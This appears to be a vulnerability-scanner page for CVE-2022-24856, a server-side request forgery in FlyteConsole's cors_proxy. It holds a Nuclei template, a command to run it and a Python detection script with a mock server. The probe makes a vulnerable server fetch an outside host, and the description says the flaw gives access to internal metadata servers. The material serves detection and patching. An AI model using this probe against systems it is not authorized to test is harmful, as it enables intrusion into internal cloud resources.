Flyte Console <0.52.0 - Server-Side Request Forgery
ID: CVE-2022-24856
Severity: high
Author: pdteam
Tags: cve2022,cve,flyteconsole,ssrf,oss,hackerone,flyte
Description
FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when the console is reachable from the general internet: its cors_proxy endpoint fetches an attacker-supplied URL on the server's behalf. An attacker can use any vulnerable instance as a relay to reach the internal cloud metadata server or other unauthenticated internal URLs, and request headers may be passed on to an unauthorized party. The fix in 0.52.0 removes the cors_proxy entirely.
YAML Source

id: CVE-2022-24856

info:
  name: Flyte Console <0.52.0 - Server-Side Request Forgery
  author: pdteam
  severity: high
  description: |
    FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur.
  impact: |
    An attacker can exploit this vulnerability to perform unauthorized actions, such as accessing internal resources, bypassing security controls, or launching further attacks.
  remediation: |
    The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole.
  reference:
    - https://github.com/flyteorg/flyteconsole/security/advisories/GHSA-www6-hf2v-v9m9
    - https://github.com/flyteorg/flyteconsole/pull/389
    - https://hackerone.com/reports/1540906
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24856
    - https://github.com/flyteorg/flyteconsole/commit/05b88ed2d2ecdb5d8a8404efea25414e57189709
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-24856
    cwe-id: CWE-918
    epss-score: 0.08397
    epss-percentile: 0.94394
    cpe: cpe:2.3:a:flyte:flyte_console:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: flyte
    product: flyte_console
  tags: cve2022,cve,flyteconsole,ssrf,oss,hackerone,flyte

http:
  - method: GET
    path:
      - "{{BaseURL}}/cors_proxy/https://oast.me/"

    matchers:
      - type: word
        words:
          - "Interactsh Server"
# digest: 490a00463044022021e2fb75b910ee3f62772dff7ff7405e21d6ff360a0a3589fe8bd2805830a909022056f5bba94c1736db2aa57ca845378e62140da8481d68f25d403b488512874544:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

The template makes a single GET request to {{BaseURL}}/cors_proxy/https://oast.me/. On a vulnerable console the cors_proxy fetches that URL server-side and relays the response, so the body contains the Interactsh server banner ("Interactsh Server"), which the word matcher looks for. A patched console (0.52.0 or later) no longer has the cors_proxy route and answers 404, so the matcher does not fire. Run the check with Nuclei, replacing URL with the console's base URL:

$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-24856.yaml"
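The same check, reproduced as a stand-alone Python script so the request, the matcher and the expected behaviour of a patched instance can be read in one place. This is an added example; it is neither the Nuclei template nor FlyteConsole code. The mock HTTP server is a constructed stand-in that answers the /cors_proxy/ path the way a relaying proxy would (vulnerable) or with 404 (patched) so the script runs offline; the function names are the example's own. Against a live target, the console, not your machine, makes the outbound request to oast.me, and a 404 or connection error is reported as not vulnerable because the fix removed the route altogether.

```python
"""Manual check for CVE-2022-24856 (FlyteConsole cors_proxy SSRF).

Added example, not part of the Nuclei template or of FlyteConsole. It
reproduces the template's single request, GET {{BaseURL}}/cors_proxy/<url>,
and its word matcher. The mock server below is a constructed stand-in so the
script runs offline; it is not FlyteConsole code.
"""
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

CORS_PROXY_PREFIX = "/cors_proxy/"
# Out-of-band target used by the template; Interactsh answers HTTP with this banner.
OAST_TARGET = "https://oast.me/"
MATCH_WORDS = ("Interactsh Server",)


def build_probe_url(base_url: str, target: str = OAST_TARGET) -> str:
    """Mirror the template path: {{BaseURL}}/cors_proxy/https://oast.me/ ."""
    return base_url.rstrip("/") + CORS_PROXY_PREFIX + target


def body_matches(body: str, words=MATCH_WORDS) -> bool:
    """Nuclei 'word' matcher with its default AND condition: every word must appear."""
    return all(w in body for w in words)


def check(base_url: str, timeout: float = 10.0) -> dict:
    """Send the probe and report whether the body shows the proxy relaying oast.me.

    404 (route deleted by the fix) and transport errors count as not vulnerable.
    """
    url = build_probe_url(base_url)
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read(65536).decode("utf-8", "replace")
            return {"url": url, "status": resp.status, "vulnerable": body_matches(body)}
    except urllib.error.HTTPError as e:
        return {"url": url, "status": e.code, "vulnerable": False}
    except (urllib.error.URLError, OSError) as e:
        return {"url": url, "status": None, "vulnerable": False, "error": str(e)}


class _MockConsole(BaseHTTPRequestHandler):
    """Constructed stand-in (hypothetical): when `vulnerable` is True the
    /cors_proxy/ path relays what the proxied target would return; otherwise
    the route does not exist and the server answers 404, like 0.52.0+."""
    vulnerable = True

    def do_GET(self):
        if self.vulnerable and self.path.startswith(CORS_PROXY_PREFIX):
            body = b"<html><body>Interactsh Server</body></html>"
            self.send_response(200)
        else:
            body = b"Not Found"
            self.send_response(404)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the mock quiet
        pass


def run_against_mock(vulnerable: bool) -> dict:
    """Start the mock on an ephemeral loopback port, run check(), stop it."""
    handler = type("Handler", (_MockConsole,), {"vulnerable": vulnerable})
    srv = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        return check(f"http://127.0.0.1:{srv.server_address[1]}", timeout=5)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(check(sys.argv[1]))  # e.g. python3 check.py https://console.example.com
    else:
        print("vulnerable mock:", run_against_mock(True))
        print("patched mock   :", run_against_mock(False))
```

Run it with a base URL to probe a real instance you are authorized to test, or with no arguments to see the two mock outcomes side by side. The `max-request: 1` in the template's metadata is honoured: one GET per target, no follow-up requests.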